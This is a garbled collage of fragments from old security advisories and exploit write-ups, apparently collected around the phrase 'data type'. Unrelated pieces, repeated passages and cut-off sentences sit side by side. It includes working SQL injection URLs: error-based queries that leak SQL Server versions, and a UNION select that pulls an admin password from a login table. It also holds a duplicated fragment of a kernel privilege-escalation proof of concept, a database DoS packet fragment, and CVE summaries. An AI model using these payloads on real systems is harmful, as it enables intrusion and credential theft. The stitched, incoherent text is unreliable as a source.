data type
case NOERROR:
if (hp->ancount) {
...
<many fine test etc>
...
switch (qdatatype) {
case T_PTR:
if (!Is_PTR(rp))
if (debug) {
restell("Resolver warning: Ignoring response with unexpected query type \"PTR\".");
return;
Requesting the following URL returns the version of Windows and SQL server:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
Other URLs:
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"
"2010-5-23\n"
"By Lincoin \n\nPress Enter");
HKEY hkey ;
WCHAR InstallPath[MAX_PATH];
DWORD datatype ;
DWORD datasize = MAX_PATH * sizeof(WCHAR);
ULONG oldlen ;
PVOID pOldBufferData = NULL ;
if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"
"2010-5-23\n"
"By Lincoin \n\nPress Enter");
HKEY hkey ;
WCHAR InstallPath[MAX_PATH];
DWORD datatype ;
DWORD datasize = MAX_PATH * sizeof(WCHAR);
ULONG oldlen ;
PVOID pOldBufferData = NULL ;
if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)
Vulnerability Table
===================
1. CA Erwin Datatype Standards File Denial of
Service Vulnerability
2. G DATA Antivirus SelectPath() ScanObjectBrowser.dll
Buffer Overflow Vulnerability
3. CA eTrust ITM r8.1 Web Console Script Redirection
Vulnerability
SQL error returned (notice the username 'adminuser'):
"Syntax error converting the varchar value 'adminuser' to a column of
data type int."
SQL error returned (notice the password 'p4ssw0rd!!'):
https://target.foo/progress/PasswordReminder.asp?ReminderButton=Submit&UserName='+union+select+min(Login.Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+Login+where+Login.UserName='adminuser'--
libjasper/jpc/jpc_cs.c in JasPer 1.900.1 allows remote attackers to
execute arbitrary code or cause a denial of service (memory corruption)
via a crafted numrlvls value in a JPEG2000 file (CVE-2011-4516).
The jpc_crg_getparms function in libjasper/jpc/jpc_cs.c in JasPer
1.900.1 uses an incorrect data type during a certain size calculation,
which allows remote attackers to trigger a heap-based buffer overflow
and execute arbitrary code, or cause a denial of service (heap memory
corruption), via a malformed JPEG2000 file (CVE-2011-4517).
The updated packages have been patched to correct these issues.
Returns:
"Error retrieving password reminder. Syntax error converting the nvarchar
value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2
(Build 3790: Service Pack 2) ' to a column of data type int."
Recommendation:
Vendor refused to comment on whether they would develop a patch or even notify
existing client base.
The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before
p173 allows context-dependent attackers to cause a denial of service
(application crash) via a string argument that represents a large
number, as demonstrated by an attempted conversion to the Float
data type.
This update corrects the problem.
_______________________________________________________________________
References:
In other, probably more recent versions, a 13-column query is required
or the UNION. What does not change, is that of all of the various
versions I've encountered, all are vulnerable to SQL injection.
The ideal fix would be to ensure that the 'node_id' request variable is
the appropriate data-type (signed int) before passing it as part of a
SQL query.
Vendor Status:
A private ticket was created on the vendors Bug Tracker page prior to
this release. However, I have decided to release this vulnerability
The following vulnerabilities were reported in all mentioned Mozilla
products:
* TippingPoint's Zero Day Initiative reported that an incorrect
integer data type is used as a CSS object reference counter, leading
to a counter overflow and a free() of in-use memory (CVE-2008-2785).
* Igor Bukanov, Jesse Ruderman and Gary Kwong reported crashes in the
JavaScript engine, possibly triggering memory corruption
(CVE-2008-2799).
by a server in a post-renegotiation context, related to a plaintext
injection attack, aka the Project Mogul issue (CVE-2009-3555).
The gnutls_x509_crt_get_serial function in the GnuTLS library before
1.2.1, when running on big-endian, 64-bit platforms, calls the
asn1_read_value with a pointer to the wrong data type and the wrong
length value, which allows remote attackers to bypass the certificate
revocation list (CRL) check and cause a stack-based buffer overflow
via a crafted X.509 certificate, related to extraction of a serial
number (CVE-2010-0731).
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists within the implementation of web worker
threads. Due to mishandling the array data type while processing posted
messages, a web worker thread can be made to corrupt heap memory. An
attacker can exploit this vulnerability to execute arbitrary code under
the context of the user running the browser.
-- Vendor Response:
the CPU's time introducing a Denial of Service condition.
Details
*******
Once a client connects to the database process and performs protocol
negoation (TNS packet type 1) and data type represenations (packet type 2)
it may then send packets of type 6 - Data packets. If the server gets a
packet with the 2nd bit of the Data flags is set then the server runs at
100% CPU:
"\x00\x1D" // Packet Size
quan%5B3afcdbfeb6ecfbdd0ba628696e3cc163%5D=3&shipKey=1'&coupon=
- -----/
This happens because the 'shipKey' is assumed to be of the 'int'
datatype, and is not cast nor checked before sent to the database, as
we can see in the folling code snippet:
/-----
if(isset($_POST['shipKey']) && $_POST['shipKey']>0) {
$cart->setVar($_POST['shipKey'],'shipKey');
The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before
p173 allows context-dependent attackers to cause a denial of service
(application crash) via a string argument that represents a large
number, as demonstrated by an attempted conversion to the Float data
type (CVE-2009-1904).
Packages for 2008.0 are being provided due to extended support for
Corporate products.
This update provides a solution to these vulnerabilities.
The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before
p173 allows context-dependent attackers to cause a denial of service
(application crash) via a string argument that represents a large
number, as demonstrated by an attempted conversion to the Float
data type.
This update corrects the problem.
_______________________________________________________________________
References:
##########################################################
Description:
Jamroom is a popular online social media cms used to host artist sites
and create music communities. It is vulnerable to a flaw in datatype
comparison that allows for an attacker to bypass the authentication
process completely and gain access to any account with only a username.
This vulnerability has been patched in the latest version of JamRoom and
all users are encouraged to upgrade as soon as possible.
epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows
remote attackers to execute arbitrary code via a crafted .pcap file
(CVE-2011-1591).
The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x
before 1.4.5 on Windows uses an incorrect integer data type during
decoding of SETCLIENTID calls, which allows remote attackers to cause
a denial of service (application crash) via a crafted .pcap file
(CVE-2011-1592).
The updated packages have been upgraded to the latest 1.2.x version
|
